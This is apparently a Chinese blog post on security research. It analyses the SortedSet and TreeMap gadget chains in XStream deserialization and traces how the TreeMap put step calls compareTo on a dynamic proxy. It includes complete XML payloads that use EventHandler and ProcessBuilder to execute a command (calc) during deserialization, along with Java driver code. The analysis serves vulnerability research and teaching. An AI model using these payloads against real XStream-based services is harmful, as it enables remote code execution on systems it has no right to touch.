当前位置: 首页 > news >正文

【Web】浅聊XStream反序列化之SortedSetTreeMap利用链

前文:【Web】浅聊XStream反序列化本源之恶意动态代理注入-CSDN博客

前言

在上一篇文章我们聊到可以用XStream反序列化来进行恶意动态代理的注入,但其有一个很大的限制就是必须要知道目标靶机会调用哪个接口的方法,才能去相应地精心构造对应接口的动态代理类,触发EventHandler从而进行恶意命令执行。

有没有通用性更强的解决方案,不需要靶机执行某接口方法,只要完成反序列化的过程就可以直接利用呢?

自然是有的,下面我们就来介绍SortedSet和TreeMap两条链

复现

SortedSetExp.java

package com.XStream;import com.thoughtworks.xstream.XStream;import java.io.FileInputStream;public class SortedSetExp {public static void main(String[] args) throws Exception{FileInputStream fileInputStream = new FileInputStream("payload.xml");XStream xStream = new XStream();xStream.fromXML(fileInputStream);}
}

payload.xml

<sorted-set><string>foo</string><dynamic-proxy><interface>java.lang.Comparable</interface><handler class='java.beans.EventHandler'><target class='java.lang.ProcessBuilder'><command><string>calc</string></command></target><action>start</action></handler></dynamic-proxy>
</sorted-set>

TreeMapExp

package com.XStream;import com.thoughtworks.xstream.XStream;import java.io.FileInputStream;public class TreeMapExp {public static void main(String[] args) throws Exception{FileInputStream fileInputStream = new FileInputStream("payload2.xml");XStream xStream = new XStream();xStream.fromXML(fileInputStream);}
}

payload2.xml

<tree-map><entry><string>fookey</string><string>foovalue</string></entry><entry><dynamic-proxy><interface>java.lang.Comparable</interface><handler class='java.beans.EventHandler'><target class='java.lang.ProcessBuilder'><command><string>calc</string></command></target><action>start</action></handler></dynamic-proxy><string>good</string></entry>
</tree-map>

根源的原理

记住我们的目的:只要完成反序列化的过程就可以直接调用动态代理类的Eventhandler#invoke,为此我们需要让动态代理类接口的某个方法在反序列化还原过程中自动调用

这里大佬们找到的是Comparable接口的compareTo方法

在TreeMap的put方法里就进行了compareTo方法的调用,而下面的两条链,其实最后都是依托TreeMap#put来完成反序列化的数据结构还原的,这和我们的目标一拍即合。

 

SortedSet链分析

一开始是HierarchicalStreams.readClassType获取待反序列化类的Class对象,前半段和上篇文章讲的一样,不作赘述,我们直接关注不一样的点

来到DynamicProxyMapper#realClass,注意elementName和alias是不相等的

会继续调用super.realClass作为返回值type

跟进

跟进DefaultMapper.realClass,取到一个加载的SortedSet类(注意initialize参数为false,所以并未初始化)

 返回的type就是SortedSet.class

接着进到convertAnother对该类进行实例化

先是进行一个类型转化 ,mapper.defaultImplementationOf() 用于设定某个接口或抽象类的默认实现,以确保在没有显式指定实现的情况下,能够使用预设的默认实现。这样可以简化代码中对实现的选择和配置。

 成功将SortedSet转化为默认实现类型TreeSet

接着调用lookupConverterForType来取对应的converter,这里的this.converterLookup就是XStream

 跟进XStream#lookupConverterForType

跟进defaultConverterLookup.lookupConverterForType,这里的逻辑是,迭代this.converters,直到找到能转换出TreeSet类型,最后取到converter为TreeSetConverter

 然后传参进convert调用

跟进,调用TreeSetConverter#unmarshal

 跟进,调用TreeMapConverter#populateTreeMap,顾名思义,就是开始填充TreeMap

 先创建一个空sortedMap

循环取出所有反序列化完毕的元素存到sortedMap 

 这个sortedMap只是一个缓存的地方,真正的返回值是TreeMap。之后判断JVM是否全部缓存好元素了,然后把sortedMap的缓存元素全部放入TreeMap作为反序列化的返回对象

简单跟一跟

 最后调用了k(也就是动态代理类)的compareTo方法,传入参数是第一个key String

从而进到EventHandler#invoke,进行恶意命令的调用,这部分和上篇文章讲的一样,不再赘述。

TreeMap链分析

先是取到type为java.util.TreeMap

 后续type没有进行默认类型转换

取到TreeMapConverter来进行convert还原待反序列化类

最后又进了TreeMapConverter#populateTreeMap,来到了熟悉的环节,后面就和上面讲的一样了,不再赘述

http://www.lryc.cn/news/317623.html

相关文章:

  • HTML CSS学习
  • MySQL的事务隔离是如何实现的?
  • STM32电源及时钟介绍
  • 使用公式在Excel中指定列值的变化实现自动间隔着色(不是按照固定的行数)
  • 蚓链给传统供应链的数字化解决方案会带来什么价值呢?
  • 有来团队后台项目-解析8
  • vs2022的下载及安装教程(Visual Studio 2022)
  • BFS(宽度优先搜索)C++(Acwing)
  • 信息收集:端口扫描原理,端口扫描分类,端口扫描工具,手动判断操作系统,操作系统识别工具
  • 【Tauri】(5):本地运行candle和 qwen 大模型,并测试速度
  • 基于udp协议的cs网络通信代码(echo版+命令行输入版+执行指令版),netstat指令
  • centos7网络命令:ping、dig、nsloopup、tcpdump
  • Excel判断CD两列在EF两列的列表中是否存在
  • 基于斑翠鸟优化算法(Pied Kingfisher Optimizer ,PKO)的无人机三维路径规划(MATLAB)
  • 同程旅行前端面试汇总
  • 小美的平衡矩阵_dp思路
  • json展示curl 请求接口返回结果
  • 2024 年排名前 5 名的 Mac 数据恢复软件分享
  • 请描述一下Spring MVC的工作流程。在Spring MVC中,DispatcherServlet的作用是什么?
  • 2023年终总结——跌跌撞撞不断修正
  • OPPO后端二面,凉了!
  • Unity3d版白银城地图
  • 【PCL】(二十八)点云超体素分割
  • Socket通信Demo(Unity客户端和C#)
  • Lucene 自定义词库
  • 【LeetCode热题100】73. 矩阵置零(矩阵)
  • 使用Barrier共享鼠标键盘,通过macos控制ubuntu系统
  • c++:类和对象中:拷贝构造和赋值运算符重载详解
  • Day33:安全开发-JavaEE应用SQL预编译Filter过滤器Listener监听器访问控制
  • Log4j如何支持多线程环境?你如何优化Log4j的性能?